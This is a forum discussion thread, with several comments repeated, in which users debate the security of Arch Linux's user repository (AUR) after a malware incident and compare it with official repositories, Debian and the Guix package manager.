AUR has never been a good idea. I don’t use it and this news proved me right.
Does that mean a distro official package manager would be immune to infections? Of course not, but they do offer a more secure distribution system and build greater trust. Minimizing the chance of malware being spread through their means.
Edit: If you have the knowledge and time to inspect the AUR packages you install, AUR might be good for you. I have none of these, that’s why I stick to my official distro packages (and sometimes also some flatpak but from official sources)
It’s just a repository of user-contributed packages. It’s no different malware-ability-wise to, say, GitHub. If you are running code you found from a stranger on the internet then you are liable for it, and you need to do your due diligence in checking that you are not running malware. It is a good thing that the AUR exists because it means Arch user packages are all in one centralised repository instead of scattered across GitHub, Sourceforge, Codeberg, Pastebin, forums, whatever. If you are just installing random AUR packages then that’s on you. It’s basic internet safety to not automatically trust random scripts you find on the internet.
I never said that GitHub was better. I just don’t feel like using a package maintained by a stranger with no tied to neither the software I want to install nor the distribution packages repository.
Of course installing random code from stranger is never great advice regardless of the distribution source. But AUR is simply not for me, and many users don’t understand the risk or let’s say responsabilities it involves while installing packages from that source.
AUR has never been a good idea. I don’t use it and this news proved me right.
But is Arch sufficiently complete without AUR packages? It is being criticized - and rightly so - that the magnificient Arch Wiki is full of references to AUR packages. That could in fact mislead new users.
I am an happy Arch user, since about ten years… But I use it differently. I am running Debian stable on the hardware, which has all the drivers I need (after getting rid of NVidia graphics, which was just a mistake to buy). I use Debian for my work / office / productivity system, to read email, and so on.
But for some stuff, I need newer software: For trying out new features or libraries (I am a developer). For testing out new window managers. Leisure programming. And so on. I use Arch for this. After a few years of dual booting (which caused occasional breakage), I settled on running Arch in a VM. Which works fine for me.
And the last shift I am experiencing is that I use more and more the Guix package manager. The reason for this is that when one tries out a lot of things, and does only system upgrades for many years (which means not doing a reinstall, but replacing the oldstable packages with the newer stable packages), the system becomes a bit untidy over time. Old packages, scripts, and configurations accumulate, and it is hard to get rid of it without breaking things, because one just cannot delete everything one does not remember what it was needed for. And there is so much stuff in software that, after all, turns out to be not such a good idea. Yes, a fresh OS install leaves a tidy system, but it would cost a few days. (By the way, accumulating cruft in the long term is also somewhat of an disadvantage of rolling release distros.)
Now, Guix solves that, because I have a temporary, deterministic environment for every programming project (just like a Python venv). And by this way, stuff does not contaminate the base system, and is garbage collected when it is not used any more.
And, Guix has quite recent packages, similar to Arch.
The issue with Arch is that they have like no packages at all. You’re more or less forced to use the AUR. Which is not something I would recommend to anyone. Which is also why I don’t recommend Arch to anyone. :D
Minimizing the chance of malware being spread through their means.
Right. And there is another angle to that: It is far easier to turn an ecosystem into a breeding ground for malware, than to get rid of it again. Once a system has a reputation to be easily hackable, it attracts malware like spoiled meat attracts flies.
AUR has never been a good idea. I don’t use it and this news proved me right.
Does that mean a distro official package manager would be immune to infections? Of course not, but they do offer a more secure distribution system and build greater trust. Minimizing the chance of malware being spread through their means.
Edit: If you have the knowledge and time to inspect the AUR packages you install, AUR might be good for you. I have none of these, that’s why I stick to my official distro packages (and sometimes also some flatpak but from official sources)
It’s just a repository of user-contributed packages. It’s no different malware-ability-wise to, say, GitHub. If you are running code you found from a stranger on the internet then you are liable for it, and you need to do your due diligence in checking that you are not running malware. It is a good thing that the AUR exists because it means Arch user packages are all in one centralised repository instead of scattered across GitHub, Sourceforge, Codeberg, Pastebin, forums, whatever. If you are just installing random AUR packages then that’s on you. It’s basic internet safety to not automatically trust random scripts you find on the internet.
I never said that GitHub was better. I just don’t feel like using a package maintained by a stranger with no tied to neither the software I want to install nor the distribution packages repository.
Of course installing random code from stranger is never great advice regardless of the distribution source. But AUR is simply not for me, and many users don’t understand the risk or let’s say responsabilities it involves while installing packages from that source.
But is Arch sufficiently complete without AUR packages? It is being criticized - and rightly so - that the magnificient Arch Wiki is full of references to AUR packages. That could in fact mislead new users.
I am an happy Arch user, since about ten years… But I use it differently. I am running Debian stable on the hardware, which has all the drivers I need (after getting rid of NVidia graphics, which was just a mistake to buy). I use Debian for my work / office / productivity system, to read email, and so on.
But for some stuff, I need newer software: For trying out new features or libraries (I am a developer). For testing out new window managers. Leisure programming. And so on. I use Arch for this. After a few years of dual booting (which caused occasional breakage), I settled on running Arch in a VM. Which works fine for me.
And the last shift I am experiencing is that I use more and more the Guix package manager. The reason for this is that when one tries out a lot of things, and does only system upgrades for many years (which means not doing a reinstall, but replacing the oldstable packages with the newer stable packages), the system becomes a bit untidy over time. Old packages, scripts, and configurations accumulate, and it is hard to get rid of it without breaking things, because one just cannot delete everything one does not remember what it was needed for. And there is so much stuff in software that, after all, turns out to be not such a good idea. Yes, a fresh OS install leaves a tidy system, but it would cost a few days. (By the way, accumulating cruft in the long term is also somewhat of an disadvantage of rolling release distros.)
Now, Guix solves that, because I have a temporary, deterministic environment for every programming project (just like a Python venv). And by this way, stuff does not contaminate the base system, and is garbage collected when it is not used any more.
And, Guix has quite recent packages, similar to Arch.
Now I use Arch less and less.
The issue with Arch is that they have like no packages at all. You’re more or less forced to use the AUR. Which is not something I would recommend to anyone. Which is also why I don’t recommend Arch to anyone. :D
Is Guix the GNU approach to NixOS?
Right. And there is another angle to that: It is far easier to turn an ecosystem into a breeding ground for malware, than to get rid of it again. Once a system has a reputation to be easily hackable, it attracts malware like spoiled meat attracts flies.